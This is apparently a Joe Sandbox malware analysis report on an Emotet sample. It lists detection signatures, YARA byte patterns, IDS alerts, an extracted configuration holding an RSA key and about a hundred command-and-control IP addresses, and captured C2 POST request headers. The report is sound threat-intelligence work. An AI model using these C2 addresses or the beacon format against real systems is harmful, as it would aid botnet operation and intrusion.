Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ExeFile (317).exe

Overview

General Information

Sample name:ExeFile (317).exe
Analysis ID:1495943
MD5:1d94974d27fc9127c69992d325afbc89
SHA1:f238ed9987b52b8368c872804e64fea64360f0be
SHA256:8c040d75defb681d1757421cad1fde62b74ba124a23e3b9ab3826d9806dcb35a
Tags:EmotetHeodo
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Connects to several IPs in different countries
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ExeFile (317).exe (PID: 7076 cmdline: "C:\Users\user\Desktop\ExeFile (317).exe" MD5: 1D94974D27FC9127C69992D325AFBC89)
    • oleaut32.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe" MD5: 1D94974D27FC9127C69992D325AFBC89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["71.72.196.159:80", "134.209.36.254:8080", "120.138.30.150:8080", "94.23.216.33:80", "157.245.99.39:8080", "137.59.187.107:8080", "94.23.237.171:443", "61.19.246.238:443", "156.155.166.221:80", "50.35.17.13:80", "153.137.36.142:80", "91.211.88.52:7080", "209.141.54.221:8080", "185.94.252.104:443", "174.45.13.118:80", "87.106.136.232:8080", "62.75.141.82:80", "213.196.135.145:80", "188.219.31.12:80", "82.80.155.43:80", "187.161.206.24:80", "172.91.208.86:80", "124.41.215.226:80", "107.5.122.110:80", "200.123.150.89:443", "95.179.229.244:8080", "83.169.36.251:8080", "1.221.254.82:80", "95.213.236.64:8080", "181.169.34.190:80", "47.144.21.12:443", "203.153.216.189:7080", "89.216.122.92:80", "84.39.182.7:80", "94.200.114.161:80", "104.236.246.93:8080", "139.99.158.11:443", "176.111.60.55:8080", "78.24.219.147:8080", "220.245.198.194:80", "62.30.7.67:443", "139.162.108.71:8080", "104.32.141.43:80", "153.232.188.106:80", "93.147.212.206:80", "79.137.83.50:443", "96.249.236.156:443", "24.43.99.75:80", "75.80.124.4:80", "42.200.107.142:80", "110.5.16.198:80", "5.196.74.210:8080", "110.145.77.103:80", "200.114.213.233:8080", "85.152.162.105:80", "5.39.91.110:7080", "109.74.5.95:8080", "140.186.212.146:80", "37.187.72.193:8080", "97.82.79.83:80", "139.130.242.43:80", "201.173.217.124:443", "123.176.25.234:80", "104.131.44.150:8080", "74.208.45.104:8080", "139.59.60.244:8080", "120.150.60.189:80", "74.219.172.26:80", "219.75.128.166:80", "82.225.49.121:80", "85.105.205.77:8080", "24.179.13.119:80", "74.120.55.163:80", "174.102.48.180:443", "219.74.18.66:443", "168.235.67.138:7080", "194.187.133.160:443", "78.187.156.31:80", "103.86.49.11:8080", "61.92.17.12:80", "24.137.76.62:80", "104.131.11.150:443", "79.98.24.39:8080", "75.139.38.211:80", "162.241.242.173:8080", "195.251.213.56:80", "37.139.21.175:8080", "46.105.131.79:8080", "50.91.114.38:80", "121.124.124.40:7080", "74.134.41.124:80", "68.188.112.97:80", "137.119.36.33:80", "121.7.127.163:80", "87.106.139.101:8080", "94.1.108.190:443", "169.239.182.217:8080"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_5528b3b0unknownunknown
    • 0x2d6c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
    00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_5528b3b0unknownunknown
      • 0x590a:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
      00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        Click to see the 7 entries
        SourceRuleDescriptionAuthorStrings
        1.2.oleaut32.exe.4f279e.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
          1.2.oleaut32.exe.4f279e.2.unpackWindows_Trojan_Emotet_5528b3b0unknownunknown
          • 0x256c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
          0.2.ExeFile (317).exe.53279e.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            0.2.ExeFile (317).exe.53279e.3.raw.unpackWindows_Trojan_Emotet_5528b3b0unknownunknown
            • 0x316c:$a: 20 89 44 24 10 83 C2 02 01 74 24 10 01 7C 24 10 29 5C 24 10 66
            0.2.ExeFile (317).exe.53279e.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              Click to see the 15 entries

              System Summary

              barindex
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 134.209.36.254, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe, Initiated: true, ProcessId: 6348, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
              Timestamp:2024-08-20T18:08:26.272087+0200
              SID:2030868
              Severity:1
              Source Port:49739
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-20T18:08:30.100075+0200
              SID:2854388
              Severity:1
              Source Port:49740
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T18:08:21.130577+0200
              SID:2854388
              Severity:1
              Source Port:49737
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T18:09:00.006506+0200
              SID:2854388
              Severity:1
              Source Port:49742
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T18:07:56.975897+0200
              SID:2854388
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T18:09:32.382105+0200
              SID:2854388
              Severity:1
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-20T18:07:21.955224+0200
              SID:2030868
              Severity:1
              Source Port:49744
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-08-20T18:08:36.308902+0200
              SID:2854388
              Severity:1
              Source Port:49741
              Destination Port:8080
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: ExeFile (317).exeAvira: detected
              Source: 0.2.ExeFile (317).exe.53279e.3.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB", "C2 list": ["71.72.196.159:80", "134.209.36.254:8080", "120.138.30.150:8080", "94.23.216.33:80", "157.245.99.39:8080", "137.59.187.107:8080", "94.23.237.171:443", "61.19.246.238:443", "156.155.166.221:80", "50.35.17.13:80", "153.137.36.142:80", "91.211.88.52:7080", "209.141.54.221:8080", "185.94.252.104:443", "174.45.13.118:80", "87.106.136.232:8080", "62.75.141.82:80", "213.196.135.145:80", "188.219.31.12:80", "82.80.155.43:80", "187.161.206.24:80", "172.91.208.86:80", "124.41.215.226:80", "107.5.122.110:80", "200.123.150.89:443", "95.179.229.244:8080", "83.169.36.251:8080", "1.221.254.82:80", "95.213.236.64:8080", "181.169.34.190:80", "47.144.21.12:443", "203.153.216.189:7080", "89.216.122.92:80", "84.39.182.7:80", "94.200.114.161:80", "104.236.246.93:8080", "139.99.158.11:443", "176.111.60.55:8080", "78.24.219.147:8080", "220.245.198.194:80", "62.30.7.67:443", "139.162.108.71:8080", "104.32.141.43:80", "153.232.188.106:80", "93.147.212.206:80", "79.137.83.50:443", "96.249.236.156:443", "24.43.99.75:80", "75.80.124.4:80", "42.200.107.142:80", "110.5.16.198:80", "5.196.74.210:8080", "110.145.77.103:80", "200.114.213.233:8080", "85.152.162.105:80", "5.39.91.110:7080", "109.74.5.95:8080", "140.186.212.146:80", "37.187.72.193:8080", "97.82.79.83:80", "139.130.242.43:80", "201.173.217.124:443", "123.176.25.234:80", "104.131.44.150:8080", "74.208.45.104:8080", "139.59.60.244:8080", "120.150.60.189:80", "74.219.172.26:80", "219.75.128.166:80", "82.225.49.121:80", "85.105.205.77:8080", "24.179.13.119:80", "74.120.55.163:80", "174.102.48.180:443", "219.74.18.66:443", "168.235.67.138:7080", "194.187.133.160:443", "78.187.156.31:80", "103.86.49.11:8080", "61.92.17.12:80", "24.137.76.62:80", "104.131.11.150:443", "79.98.24.39:8080", "75.139.38.211:80", "162.241.242.173:8080", "195.251.213.56:80", "37.139.21.175:8080", "46.105.131.79:8080", "50.91.114.38:80", "121.124.124.40:7080", "74.134.41.124:80", "68.188.112.97:80", "137.119.36.33:80", "121.7.127.163:80", "87.106.139.101:8080", "94.1.108.190:443", "169.239.182.217:8080"]}
              Source: ExeFile (317).exeReversingLabs: Detection: 92%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.1% probability
              Source: ExeFile (317).exeJoe Sandbox ML: detected
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E25A0 CryptAcquireContextW,CryptImportKey,LocalFree,CryptCreateHash,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,1_2_005E25A0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E2210 CryptDestroyHash,CryptExportKey,CryptDuplicateHash,CryptGetHashParam,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,1_2_005E2210
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E1FA0 CryptDuplicateHash,CryptDestroyHash,memcpy,1_2_005E1FA0
              Source: ExeFile (317).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb source: ExeFile (317).exe
              Source: Binary string: vfwwdm32.pdb source: ExeFile (317).exe
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_006238B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,0_2_006238B0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E38B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,1_2_005E38B0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49737 -> 134.209.36.254:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49737 -> 134.209.36.254:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49739 -> 120.138.30.150:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49741 -> 157.245.99.39:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49741 -> 157.245.99.39:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49740 -> 94.23.216.33:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49740 -> 94.23.216.33:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49745 -> 156.155.166.221:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49745 -> 156.155.166.221:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49742 -> 137.59.187.107:8080
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49742 -> 137.59.187.107:8080
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49730 -> 71.72.196.159:80
              Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.4:49730 -> 71.72.196.159:80
              Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.4:49744 -> 61.19.246.238:443
              Source: Malware configuration extractorIPs: 71.72.196.159:80
              Source: Malware configuration extractorIPs: 134.209.36.254:8080
              Source: Malware configuration extractorIPs: 120.138.30.150:8080
              Source: Malware configuration extractorIPs: 94.23.216.33:80
              Source: Malware configuration extractorIPs: 157.245.99.39:8080
              Source: Malware configuration extractorIPs: 137.59.187.107:8080
              Source: Malware configuration extractorIPs: 94.23.237.171:443
              Source: Malware configuration extractorIPs: 61.19.246.238:443
              Source: Malware configuration extractorIPs: 156.155.166.221:80
              Source: Malware configuration extractorIPs: 50.35.17.13:80
              Source: Malware configuration extractorIPs: 153.137.36.142:80
              Source: Malware configuration extractorIPs: 91.211.88.52:7080
              Source: Malware configuration extractorIPs: 209.141.54.221:8080
              Source: Malware configuration extractorIPs: 185.94.252.104:443
              Source: Malware configuration extractorIPs: 174.45.13.118:80
              Source: Malware configuration extractorIPs: 87.106.136.232:8080
              Source: Malware configuration extractorIPs: 62.75.141.82:80
              Source: Malware configuration extractorIPs: 213.196.135.145:80
              Source: Malware configuration extractorIPs: 188.219.31.12:80
              Source: Malware configuration extractorIPs: 82.80.155.43:80
              Source: Malware configuration extractorIPs: 187.161.206.24:80
              Source: Malware configuration extractorIPs: 172.91.208.86:80
              Source: Malware configuration extractorIPs: 124.41.215.226:80
              Source: Malware configuration extractorIPs: 107.5.122.110:80
              Source: Malware configuration extractorIPs: 200.123.150.89:443
              Source: Malware configuration extractorIPs: 95.179.229.244:8080
              Source: Malware configuration extractorIPs: 83.169.36.251:8080
              Source: Malware configuration extractorIPs: 1.221.254.82:80
              Source: Malware configuration extractorIPs: 95.213.236.64:8080
              Source: Malware configuration extractorIPs: 181.169.34.190:80
              Source: Malware configuration extractorIPs: 47.144.21.12:443
              Source: Malware configuration extractorIPs: 203.153.216.189:7080
              Source: Malware configuration extractorIPs: 89.216.122.92:80
              Source: Malware configuration extractorIPs: 84.39.182.7:80
              Source: Malware configuration extractorIPs: 94.200.114.161:80
              Source: Malware configuration extractorIPs: 104.236.246.93:8080
              Source: Malware configuration extractorIPs: 139.99.158.11:443
              Source: Malware configuration extractorIPs: 176.111.60.55:8080
              Source: Malware configuration extractorIPs: 78.24.219.147:8080
              Source: Malware configuration extractorIPs: 220.245.198.194:80
              Source: Malware configuration extractorIPs: 62.30.7.67:443
              Source: Malware configuration extractorIPs: 139.162.108.71:8080
              Source: Malware configuration extractorIPs: 104.32.141.43:80
              Source: Malware configuration extractorIPs: 153.232.188.106:80
              Source: Malware configuration extractorIPs: 93.147.212.206:80
              Source: Malware configuration extractorIPs: 79.137.83.50:443
              Source: Malware configuration extractorIPs: 96.249.236.156:443
              Source: Malware configuration extractorIPs: 24.43.99.75:80
              Source: Malware configuration extractorIPs: 75.80.124.4:80
              Source: Malware configuration extractorIPs: 42.200.107.142:80
              Source: Malware configuration extractorIPs: 110.5.16.198:80
              Source: Malware configuration extractorIPs: 5.196.74.210:8080
              Source: Malware configuration extractorIPs: 110.145.77.103:80
              Source: Malware configuration extractorIPs: 200.114.213.233:8080
              Source: Malware configuration extractorIPs: 85.152.162.105:80
              Source: Malware configuration extractorIPs: 5.39.91.110:7080
              Source: Malware configuration extractorIPs: 109.74.5.95:8080
              Source: Malware configuration extractorIPs: 140.186.212.146:80
              Source: Malware configuration extractorIPs: 37.187.72.193:8080
              Source: Malware configuration extractorIPs: 97.82.79.83:80
              Source: Malware configuration extractorIPs: 139.130.242.43:80
              Source: Malware configuration extractorIPs: 201.173.217.124:443
              Source: Malware configuration extractorIPs: 123.176.25.234:80
              Source: Malware configuration extractorIPs: 104.131.44.150:8080
              Source: Malware configuration extractorIPs: 74.208.45.104:8080
              Source: Malware configuration extractorIPs: 139.59.60.244:8080
              Source: Malware configuration extractorIPs: 120.150.60.189:80
              Source: Malware configuration extractorIPs: 74.219.172.26:80
              Source: Malware configuration extractorIPs: 219.75.128.166:80
              Source: Malware configuration extractorIPs: 82.225.49.121:80
              Source: Malware configuration extractorIPs: 85.105.205.77:8080
              Source: Malware configuration extractorIPs: 24.179.13.119:80
              Source: Malware configuration extractorIPs: 74.120.55.163:80
              Source: Malware configuration extractorIPs: 174.102.48.180:443
              Source: Malware configuration extractorIPs: 219.74.18.66:443
              Source: Malware configuration extractorIPs: 168.235.67.138:7080
              Source: Malware configuration extractorIPs: 194.187.133.160:443
              Source: Malware configuration extractorIPs: 78.187.156.31:80
              Source: Malware configuration extractorIPs: 103.86.49.11:8080
              Source: Malware configuration extractorIPs: 61.92.17.12:80
              Source: Malware configuration extractorIPs: 24.137.76.62:80
              Source: Malware configuration extractorIPs: 104.131.11.150:443
              Source: Malware configuration extractorIPs: 79.98.24.39:8080
              Source: Malware configuration extractorIPs: 75.139.38.211:80
              Source: Malware configuration extractorIPs: 162.241.242.173:8080
              Source: Malware configuration extractorIPs: 195.251.213.56:80
              Source: Malware configuration extractorIPs: 37.139.21.175:8080
              Source: Malware configuration extractorIPs: 46.105.131.79:8080
              Source: Malware configuration extractorIPs: 50.91.114.38:80
              Source: Malware configuration extractorIPs: 121.124.124.40:7080
              Source: Malware configuration extractorIPs: 74.134.41.124:80
              Source: Malware configuration extractorIPs: 68.188.112.97:80
              Source: Malware configuration extractorIPs: 137.119.36.33:80
              Source: Malware configuration extractorIPs: 121.7.127.163:80
              Source: Malware configuration extractorIPs: 87.106.139.101:8080
              Source: Malware configuration extractorIPs: 94.1.108.190:443
              Source: Malware configuration extractorIPs: 169.239.182.217:8080
              Source: unknownNetwork traffic detected: IP country count 32
              Source: global trafficTCP traffic: 192.168.2.4:49737 -> 134.209.36.254:8080
              Source: global trafficTCP traffic: 192.168.2.4:49739 -> 120.138.30.150:8080
              Source: global trafficTCP traffic: 192.168.2.4:49741 -> 157.245.99.39:8080
              Source: global trafficTCP traffic: 192.168.2.4:49742 -> 137.59.187.107:8080
              Source: Joe Sandbox ViewIP Address: 94.200.114.161 94.200.114.161
              Source: Joe Sandbox ViewIP Address: 71.72.196.159 71.72.196.159
              Source: Joe Sandbox ViewIP Address: 85.152.162.105 85.152.162.105
              Source: Joe Sandbox ViewASN Name: DU-AS1AE DU-AS1AE
              Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
              Source: Joe Sandbox ViewASN Name: TELECABLESpainES TELECABLESpainES
              Source: Joe Sandbox ViewASN Name: TWC-10796-MIDWESTUS TWC-10796-MIDWESTUS
              Source: global trafficHTTP traffic detected: POST /aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 71.72.196.159/aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------wa4T8cPZY0e2iD10iYmCsXHost: 71.72.196.159Content-Length: 4692Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /Jg04eNfDVrhItWur/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 134.209.36.254/Jg04eNfDVrhItWur/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------Ldiwo2HtMl13Eyf6TSeHHost: 134.209.36.254:8080Content-Length: 4692Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 120.138.30.150/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------KEv02otYHost: 120.138.30.150:8080Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /FJlVHXJ3dGgmVB/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.216.33/FJlVHXJ3dGgmVB/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------Il1zs2mVlo8QKpuKXrHost: 94.23.216.33Content-Length: 4644Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /vBtfrqns/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 157.245.99.39/vBtfrqns/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------GDD4s9bMfwx0Host: 157.245.99.39:8080Content-Length: 4644Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 137.59.187.107/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------RXnIInhAfmvjq1Host: 137.59.187.107:8080Content-Length: 4644Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 94.23.237.171/IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------------5eHhzpxtLmphkbrh51Host: 94.23.237.171:443Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /yATH/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 61.19.246.238/yATH/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------meOftaXJHost: 61.19.246.238:443Content-Length: 4660Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------------upXrJchrkYq9xrNYMcg8EMHost: 156.155.166.221Content-Length: 4660Cache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 71.72.196.159
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 134.209.36.254
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 120.138.30.150
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
              Source: unknownTCP traffic detected without corresponding DNS query: 94.23.216.33
